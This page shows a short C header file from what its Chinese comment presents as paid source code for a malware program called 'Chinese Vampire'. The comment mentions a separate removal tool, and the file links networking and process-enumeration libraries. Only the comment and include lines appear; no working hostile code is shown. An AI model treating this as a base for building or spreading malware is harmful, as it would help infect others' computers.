?? head.h
字號:
/*
中華吸血鬼源代碼 作者:黑網之神購買代碼后請勿隨便發布,請
珍惜作者的勞動成果!如果代碼丟失,概不負責代碼風格和注釋我
已經改的非常好了比較清晰,容易讀懂,沒有使用C++,使用純C編寫
,直接在VC++6.0下編譯,編譯就可以使用,經過數百次的測試,已經
非常完美了,無需過多修改!如果無法清除,請向作者索要一份專殺
作者:黑網之神 2008/5/1
*/
#include "stdio.h"
#include <time.h>
#include "YouHua.h"
#include <stdlib.h>
#include <windows.h>
#include "tlhelp32.h"
#include <WINSOCK2.H>
#include <Wininet.h>
#pragma comment(lib,"Wininet.lib")
#pragma comment(lib,"ws2_32")
//--------------------------------------------------------------------------
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -